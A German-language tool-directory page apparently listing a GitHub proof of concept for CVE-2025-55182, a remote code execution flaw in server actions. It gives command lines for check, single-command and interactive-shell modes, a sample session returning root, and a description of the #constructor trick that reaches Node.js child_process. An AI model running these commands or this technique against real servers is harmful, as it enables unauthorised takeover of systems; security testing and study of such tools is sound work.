Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182-PoC — Poc für CVE-2025-55182 | Kitploit
Tools/GitHubGitHub/emiyelbarto/cve-2025-55182-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubemiyelbarto/cve-2025-55182-poc

CVE-2025-55182-PoC

Poc für CVE-2025-55182

Repository anzeigen
11vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182-PoC

Poc für CVE-2025-55182

Verwendung: python3 poc.py -u http://target.com --cmd "<cmd_here>"

Rechtlicher Hinweis

Dieses Tool dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests. Die Verwendung dieses Tools zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal. Der Entwickler übernimmt keine Haftung und ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.

Anforderungen

pip install requests

Verwendung

Sie können das Tool in drei Modi ausführen: Check, Exploit oder Interaktive Shell.

verwendung: poc.py [-h] [-u URL] [--id ID] [-c CMD] [--check]

optionen:
  -h, --help         Zeigt diese Hilfemeldung an und beendet das Programm
  -u URL             Ziel-URL (z.B. http://localhost:3000)
  --id ID            Ziel-Server-Aktions-ID (Standard: user-profile-action)
  -c CMD, --cmd CMD  Direkt auszuführender Befehl (nicht-interaktiver Modus)
  --check            Nur auf Schwachstelle prüfen (Absturz-Methode), nicht ausnutzen

Beispiel

python3 poc.py -u http://target-site.com --check

Einzelne Befehlsausführung

python3 poc.py -u http://target-site.com --cmd "id"

Interaktiver Shell-Modus

python3 poc.py

# Innerhalb der Shell
RSC-Shell> set url http://localhost:3000
[+] URL gesetzt auf: http://localhost:3000
RSC-Shell> check
[+] ZIEL IST VERWUNDBAR!
RSC-Shell> shell
[*] Starte pseudo-interaktive Shell. 'exit' zum Zurückkehren.
cmd> whoami
root

Funktionsweise

Der Check: Sendet eine Multipart-Anfrage, die {} bei Index 1 definiert und versucht, auf ["$1🅰️a"] zuzugreifen. Nicht gepatchte Server stürzen ab (HTTP 500), wenn sie versuchen, auf die Eigenschaft a von undefined zuzugreifen. Gepatchte Server geben HTTP 200 zurück.

Der Exploit: Sendet eine Multipart-Anfrage, die auf die gültige Aktions-ID verweist, jedoch #constructor anhängt. Dadurch wird der Serialisierer dazu gebracht, den Function-Konstruktor zurückzugeben, sodass wir beliebiges JavaScript (Node.js child_process) übergeben können, das auf dem Server ausgeführt wird.

Tool herunterladen